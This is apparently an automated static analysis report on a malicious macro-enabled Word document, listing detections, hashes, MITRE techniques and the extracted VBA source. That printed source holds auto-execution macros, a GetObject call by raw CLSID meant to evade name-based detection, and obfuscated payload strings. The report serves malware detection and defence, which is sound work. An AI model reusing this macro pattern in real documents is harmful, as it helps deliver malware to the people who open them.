Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4f30ee61af69027…

MALICIOUS

Office (OOXML)

19.2 KB Created: 2021-10-18 14:22:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-24
MD5: 0b70546b28da5c1ad2bc4a52a6b0c283 SHA-1: 3b2117fb8c4ae60ee931dca1d15dce002abd7f36 SHA-256: a4f30ee61af69027b7dd73603b8c37cac142a1e2a509ded8934450c3e0d3fe30
296 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1219 Remote Access Software

The sample is an OOXML document containing multiple auto-execution VBA macros (AutoOpen, Document_Open, Auto_Open, Workbook_Open). These macros call the GetObject function with a specific CLSID ({c08afd90-f2a1-11d1-8455-00a0c91f3880}), which is a known technique for executing arbitrary code or downloading secondary payloads. The VBA code also attempts to construct the string 'hell' but does not complete the action. The presence of these auto-executing macros and the GetObject call strongly suggests a downloader or initial execution vector for further malicious activity.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Private Sub helloWord()
        Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  • VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION
    VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
    Matched line in script
    Private Sub helloWord()
        Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        ' Becomes launched as first on MS Word
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
        ' Becomes launched as second, another try, on MS Word
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        ' Becomes launched as second, another try, on MS Excel
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        ' Becomes launched as first on MS Excel
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1811 bytes
SHA-256: d8c17a92dcac6f092f21e1389a5a1190190656152b2245a42233de269fed056c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public alreadyLaunched As Integer

Private Function favourite() As String
    favourite = "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99LQBV9 FI9SQ9g9 Gg9d9B0 9H99cw969C 89LwBi9G k9d99u9Gw9eQ9 v9DM9awBL9  GI9Ug92 9HM9I99t9E89I9  BD9Do"
End Function

Private Function examination() As String
    examination = "9X9 BV9HM9ZQBy9 HM9X9BH9EI9 TwBZ9EU 9UgBc9 EE9c9Bw9EQ 9YQB09GE9X9 BM9G89Yw Bh9Gw9X9 BU9GU9bQB w9Fw9 dwBl9GI9a9 Bv9HM9d9 9u9GU9e9B l9Ds9  UwB09GE 9cgB09C"
End Function

Private Function cat() As String
    cat = "09U9B y9G89YwB l9HM9cw9g9 C09Rg9g9EM 9OgBc9FU 9cwBl9HI 9cwBc 9Ec9Qg BP9Fk 9RQBS9 Fw9QQBw9H9 9R9Bh 9HQ9Y  QBc9Ew9bw Bj9GE9b9Bc9FQ 9ZQBt9H99 X9B39 GU9YgBo9"
End Function

Private Function secretary() As String
    secretary = "G89cw B09C49ZQB 49GU9I 99t9EE9 I99n9C09Z Q9g9GM9 bQBk9C99OQ 9x9C49 MQ9y9DE9 Lg9x9Dc9Nw9u9DI  9M9909C99O99 w9Dg9M99 n9C99 LQB39Gk9I 9Bo9Ds9"
End Function


Private Sub helloWord()
    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    
    Dim fjiorr
    fjiorr = "h" & "e" & "l" & "l"


End Sub



Sub AutoOpen()
    ' Becomes launched as first on MS Word
    helloWord
End Sub

Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word
    helloWord
End Sub

Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    helloWord
End Sub

Sub Workbook_Open()
    ' Becomes launched as second, another try, on MS Excel
    helloWord
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 18944 bytes
SHA-256: 28e42e9f63a2076eefede5de3608e3953fc13167a599c17b9b8d08e182947311
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).